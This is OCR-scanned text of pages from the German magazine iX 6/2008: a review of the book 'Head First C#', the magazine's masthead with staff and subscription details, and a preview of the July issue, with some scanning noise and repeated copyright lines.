Autor dieser Rezension wur- 
de übrigens erst nach einer 
gründlich missglückten Wi- 
ki-Einführung auf den Band 
aufmerksam. Bedauerlich, 
denn Anfängerfehler zu ver- 
meiden wäre nicht schwierig 
gewesen, wie das Buch de- 
monstriert. 

REINHARD GANTAR 
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Rezensionen 


ie Vorgehensweise der 


mittlerweile etablierten 
Head-First-Reihe von O’Reil- 
ly setzt einen aktiven Leser 
voraus, der sich nicht davor 
scheut, „ein paar Neuronen zu 
strapazieren“. Auf die zahlrei- 
chen Geschichten in zwanglo- 
ser Sprache, visuellen Reize 
und anderen Kniffe, die Auf- 
merksamkeit des Lesers zu er- 
regen - und den Übergang des 
Stoffes vom Kurzzeit- in das 


Andrew Stellman, Jennifer 
Greene 


Head First C# 


Sebastopol, CA 2007 
O’Reilly Media 

778 Seiten 

48,- € 

ISBN 978-0-596-51482-2 


Langzeitgedächtnis zu unter- 
stützen — muss sich der Leser 
einlassen. 

Andrew Stellmans und 
Jennifer Greenes „Head First 
C#“ behandelt die Program- 
miersprache in Version 3.0 
sowie Visual Studio 2008. 
Kapitel 1 eröffnet mit Ent- 
wurf und Umsetzung einer 
Kontaktverwaltung. Hier lernt 
der Leser schnell, wie er mit 
Visual Studio 2008 eine Be- 


nutzerschnittstelle (mit Win- 
dows.Forms) gestaltet und 
ein Datenbankschema ent- 
wirft sowie die zugehörigen 
Tabellen anlegt. Unter Ver- 
wendung der nötigen .Net- 
Komponenten ist die ge- 
wünschte Kontaktverwaltung 
schnell umgesetzt. Das fol- 
gende „Under the Hood“ ver- 
deutlicht, dass der Entwickler 
nicht nur ein IDE-Benutzer 
ist, sondern darüber hinaus 
die zugrunde liegende Pro- 
grammiersprache beherrschen 
muss. An dieser Stelle wird 
eine Einführung in die Syn- 
tax von C# gegeben, bevor 
Stellman und Greene die dar- 
auf aufbauenden Konzepte 
der objektorientierten Pro- 
grammierung behandeln. 
„Storing lots of data“ wid- 
met sich „enums“ und „col- 
lections“, Kapitel 9 zeigt un- 
ter anderem, wie File VO in 
‚Net beziehungsweise mit C# 
funktioniert. Unter der Über- 


schrift „Putting out fires gets 
old“ erklären Autor und Au- 
torin das Konzept der Be- 
handlung von Fehlern mit 
Exceptions. Die für die GUI- 
Programmierung wichtigen 
Konzepte Events und Dele- 
gates sind ein weiteres The- 
ma. Das zwölfte Kapitel 
nimmt eine Sonderstellung 
ein, da es Themen der voran- 
gegangenen vertieft sowie ei- 
nen Ausblick auf die folgen- 
den gibt, in denen es unter 
anderem um Grafikprogram- 
mierung und LINQ geht. 
Gegenüber anderen Bü- 
chern aus der Reihe zeichnet 
sich „Head First C#“ durch 
die ausführlichen, gelunge- 
nen und „verspielten“ Bei- 
spielprojekte aus, bei denen 
der Leser sein Wissen bei der 
Programmierung klassischer 
Spielkonzepte wie runden- 
basiertem Rollenspiel in die 
Praxis umsetzt. 
SEBASTIAN BERGMANN 


150 


iX 6/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


| sERVIcE 77 | Impressum 


MAGAZIN FÜR PROFESSIONELLE 
INFORMATIONSTECHNIK 


Postfach 61 04 07, 30604 Hannover; Helstorfer Straße 7, 30625 Hannover 


Redaktion 
Telefon: 05 11/53 52-387, Fax: 05 11/53 52-361, E-Mail: post@ix.de 
‚Abonnements: Telefon: 0711/72 52-292, Fax: 0711/72 52-392, E-Mail: abo@heise.de 


Herausgeber: Christian Heise, Ansgar Heise 

Redaktion: Chefredakteur: Jürgen Seeger (JS) -386 

Stellv. Chefredakteur: Henning Behme (hb) -374 

Ltd. Redakt.: Kersten Auel (ka) -367, Ralph Hülsenbusch (rh) -373, Bert Ungerer (un) -368 
Jürgen Diercks (jd) -379, Christian Kirsch (ck) -590, Wolfgang Möhle (WM) -384, Susanne Nolte 
(sun) -689, Andre von Raison (avr) -377, Michael Riepe (mr) -787, Ute Roos (ur) -535 
Redaktionsassistenz: Carmen Lehmann (cle) -387, Michael Mentzel (mm) -153 


Korrespondent Köln/Düsseldorf/Ruhrgebiet: 
Achim Born, Siebengebirgsallee 82, 50939 Köln, Telefon: 02 21/4 20 02 62, 
E-Mail: ab@ix.de 


Korrespondentin München: 
Susanne Franke, Ansbacherstr. 2, 80796 München, Telefon: 089/28 80 74 80, 
E-Mail: sf@ix.de 


Ständige Mitarbeiter: Torsten Beyer, Detlef Borchers, Fred Hantelmann, Kai König, 
Michael Kuschke, Barbara Lange, Stefan Mintert, Holger Schwichtenberg, Susanne Schwonbeck, 
Christian Segor, Diane Sieger, Axel Wilzopolski, Nikolai Zotow 


DTP-Produktion: Enrico Eisert, Wiebke Preuß, Matthias Timm, Hinstorff Verlag, Rostock 
Korrektorat/Chefin vom Dienst: Anja Fischer 

Fotografie: Martin Klauss Fotografie, Despetal/Barfelde 

Titelidee: iX; Titel- und Aufmachergestaltung: Dietmar Jokisch 


Verlag und Anzeigenverwaltung: 
Heise Zeitschriften Verlag GmbH & Co. KG, Postfach 61 04 07, 30604 Hannover; 
Helstorfer Straße 7, 30625 Hannover; Telefon: 05 11/53 52-0, Fax: 05 11/53 52-129 


Geschäftsführer: Ansgar Heise, Steven P. Steinkraus, Dr. Alfons Schräder 
Mitglied der Geschäftsleitung: Beate Gerold 

Verlagsleiter: Dr. Alfons Schräder 

Anzeigenleitung: Michael Hanke -167, E-Mail: michael.hanke@heise.de 
Assistenz: Christine Richter -534, E-Mail: christine.richter@heise.de 
Anzeigendisposition: Christine Richter -534, E-Mail: christine.richter@heise.de 


Anzeigenverkauf: PLZ-Gebiete 0-3, Ausland: 

Oliver Kühn -395, E-Mail: oliver.kuehn@heise.de, 

PLZ-Gebiete 8-9: Ralf Räuber -218, E-Mail: ralf.raeuber@heise.de 

Sonderprojekte: Isabelle Paeseler -205, E-Mail: isabelle.paeseler@heise.de 
Anzeigen-Inlandsvertretung: PLZ-Gebiete 4-7: 

Karl-Heinz Kremer GmbH, Sonnenstraße 2, D-66957 Hilst, 

Telefon: 063 35/92 17-0, Fax: 063 35/92 17-22, E-Mail: karlheinz.kremer@heise.de 
Anzeigen-Auslandsvertretung: 

Großbritannien, Irland: Oliver Smith & Partners Ltd. Colin Smith, 18 Abbeville Mews, 88 Clapham 
Park Road, London SW4 7BX, UK, Telefon: (00 44) 20/79 78-14 40, Fax: (00 44) 20/79 78-15 50, 
E-Mail: colin@osp-uk.com 


Anzeigenpreise: Es gilt die Anzeigenpreisliste Nr. 20 vom 1. Januar 2008. 

Leiter Vertrieb und Marketing: Mark A. Cano (-299) 

Werbeleitung: Julia Conrades (-156) 

Teamleitung Herstellung: Bianca Nagel (-456) 

Druck: Dierichs Druck + Media GmbH & Co. KG, Kassel 

Sonderdruck-Service: Bianca Nagel (-456, Fax: -360) 

Verantwortlich: Textteil: Jürgen Seeger; Anzeigenteil: Michael Hanke 

iX erscheint monatlich 

Einzelpreis € 5,50, Österreich € 6,20, Schweiz CHF 10,70, Benelux € 6,70, Italien € 6,70 


Das Abonnement für 12 Ausgaben kostet: Inland € 56,-, Ausland (außer Schweiz) € 63,-; 
Studentenabonnement: Inland € 42,-, Ausland (außer Schweiz) € 47,- nur gegen Vorlage der 
Studienbescheinigung (inkl. Versandkosten Inland € 8,30, Ausland € 13,30), Luftpost auf Anfrage. 


iX-Abo* (inkl. jährlicher Archiv-CD-ROM) jeweils zzgl. € 8,— 


Für Gl-, VDI-KfIT-, GUUG-, IUG-, LUG-, AUGE- und Mac-e.V.-Mitglieder gilt der Preis des 
Studentenabonnements (gegen Mitgliedsausweis). 


Kundenkonto in Österreich: 
Dresdner Bank AG, BLZ 19675, Kto.-Nr. 2001-226-00 EUR, SWIFT: DRES ATWX 


Kundenkonto in der Schweiz: UBS AG, Zürich, Kto.-Nr. 206 PO-465.060.0 


Abo-Service: 
Heise Zeitschriften Verlag, Kundenservice, Postfach 810520, 70522 Stuttgart, 
Telefon: 0711/72 52-292, Fax: 0711/72 52-392, E-Mail: abo@heise.de 


Für Abonnenten in der Schweiz Bestellung über: 

Thali AG, Aboservice, Industriestr. 14, CH-6285 Hitzkirch, 

Telefon: 041/919 66 11, Fax: 041/919 66 77, E-Mail: abo@thali.ch, Internet: www.thali.ch (Jahres- 
abonnement: CHF 111,-; Studentenabonnement: CHF 83,25) 


Das Abonnement ohne Archiv-CD-ROM ist jederzeit mit Wirkung zur jeweils übernächsten 
Ausgabe kündbar. Das iX-Abo* (incl. jährlicher Archiv-CD-ROM) gilt zunächst für ein Jahr und ist 
danach zur jeweils übernächsten Ausgabe kündbar. 


Vertrieb Einzelverkauf (auch für Österreich, Luxemburg und Schweiz): MZV Moderner Zeit- 
schriften Vertrieb GmbH & Co. KG, Breslauer Str. 5, 85386 Eching, Telefon: 089/319 06-0, 
Fax: 089/319 06-113, E-Mail: mzv@mzv.de, Internet: www.mzv.de 


Eine Haftung für die Richtigkeit der Veröffentlichungen kann trotz sorgfältiger Prüfung durch die 
Redaktion vom Herausgeber nicht übernommen werden. Die gewerbliche Nutzung abgedruckter 
Programme ist nur mit schriftlicher Genehmigung des Herausgebers zulässig. 


Honorierte Arbeiten gehen in das Verfügungsrecht des Verlages über, Nachdruck nur mit Geneh- 
migung des Verlages. Mit Übergabe der Manuskripte und Bilder an die Redaktion erteilt der Ver- 
fasser dem Verlag das Exklusivrecht zur Veröffentlichung. Für unverlangt eingesandte Manuskripte 
kann keine Haftung übernommen werden. Sämtliche Veröffentlichungen in iX erfolgen ohne 
Berücksichtigung eines eventuellen Patentschutzes. Warennamen werden ohne Gewährleistung 
einer freien Verwendung benutzt. 


Printed in Germany 


© Copyright 2008 by Heise Zeitschriften Verlag GmbH & Co. KG 
ISSN 0935-9680 LAC) EN 


iX 6/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


161 


Juli 2008 


Das bringen 


ses wu 
‚Bacula 


Backup 
mit freien 
Tools 


Ob eine Backup-Lösung etwas taugt oder 
nicht, hängt von einem garantiert nicht ab: 
dem Preis. Viel wichtiger ist das Know- 
how der Administratoren, ihre Erfahrungen, 
was womit gut zusammenspielt. Ein Erfah- 
rungsbericht zum Thema Netzwerk-Backup 
anhand des freien Tool-Sets Bacula. 


Kreditkartenanbieter 
fordern IT-Sicherheit 


Seit Jahren doktert die Kreditwirtschaft an 
verbindlichen Sicherheitsmaßnahmen für 
Kreditkarten-Transaktionen herum. Der 
neueste Vorschlag ist der Payment Card 
Industry Data Security Standard (PCI 
DSS), auf dessen praktische Umsetzung 
die Kreditkartenanbieter jetzt drängen. 
Mittlerweile hagelt es sogar schon Ver- 
tragsstrafen bei Unterlassungssünden. 


Eclipse-Alternative: 
Netbeans 6 


Der Siegeszug der Java-Entwicklungsplatt- 
form Eclipse scheint nicht enden zu wollen. 
Im Windschatten davon hat sich aber auch 
Netbeans in den letzten Jahren gut weiter- 
entwickelt und bietet inzwischen eine 
ernstzunehmende Alternative zu Eclipse. 


Heft 07/2008 
erscheint am 19. Juni 2008 


Netbeans verfügt über einen Profiler und 
GUI-Designer, mit denen sich schnell ent- 
wickeln lässt. Wirklich große Neuerungen 
hat die Version 6 zwar nicht zu bieten, sie 
überzeugt aber in den Details. 


Herstellerübergreifende 
RDBMS-Verwaltung 


In kaum einem Unternehmen läuft nur das 
Datenbanksystem eines Herstellers. In der 
Regel sind zwei oder mehr unterschied- 
liche Produkte in Betrieb, die jeweils ihre 
eigenen Verwaltungswerkzeuge mitbrin- 
gen. Herstellerübergreifende Werkzeuge 
bieten eine einheitliche Oberfläche für 
unterschiedliche RDBMSe an und verein- 
fachen die Arbeit. iX stellt die Produkte in 


einer Marktübersicht vor. 


Bilddateien in Java laden 


Von Haus aus unterstützt Java nur wenige 
Bildformate, in die ein Bild konvertiert 
werden muss, wenn man es in eine Java- 
Anwendung lädt. Wer das nicht will - etwa 
weil die Abbildung für die Archivierung im 
Originalzustand erhalten bleiben soll — 
kann sich mit dem ImageIO Framework 
behelfen. Mit dessen Hilfe lässt sich leicht 
ein Service-Provider programmieren, der 
die Verarbeitung neuer Formate gestattet. 


Kein wichtiges Thema mehr versäumen! 
Die aktuelle iX-Inhaltsübersicht per E-Mail 


Man verpasst ja 
sonst schon genug! 
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Audio/Video: Die digitale Medien- 
flut daheim bändigen 


Scan-Druck-Kombis im Netzwerk 
ausreizen 


Active Directory hilft dem Admin 
auch im kleinen Netz 


Midi-Tower: Pfiffige PC-Gehäuse 
im Test 


Heft 11/08 jetzt am Kiosk 


Technology 
eview 


DAS M.LT. - MAGAZIN FÜR INNOVATION 


Fit für die Zukunft? 20 Spitzen- 
forscher stellen 50 Fragen. 


Alles nur gespielt: Simulationen 
für Forschung und Produktion 


Strom aus Wellen: Wie die Kraft 
der Weltmeere Energie liefern soll 


TELEPOLIS 


MAGAZIN DER NETZKULTUR 


Markus A. Born: Schiffe aus Erde 
und Abfall 


Stephan Schleim: Was ist Wissen- 
schaft? Wissenschaft prägt unser Welt- 
und Menschenbild - erstaunlich, wie 
selten über sie reflektiert wird. 


www.heise.de/tp/ 
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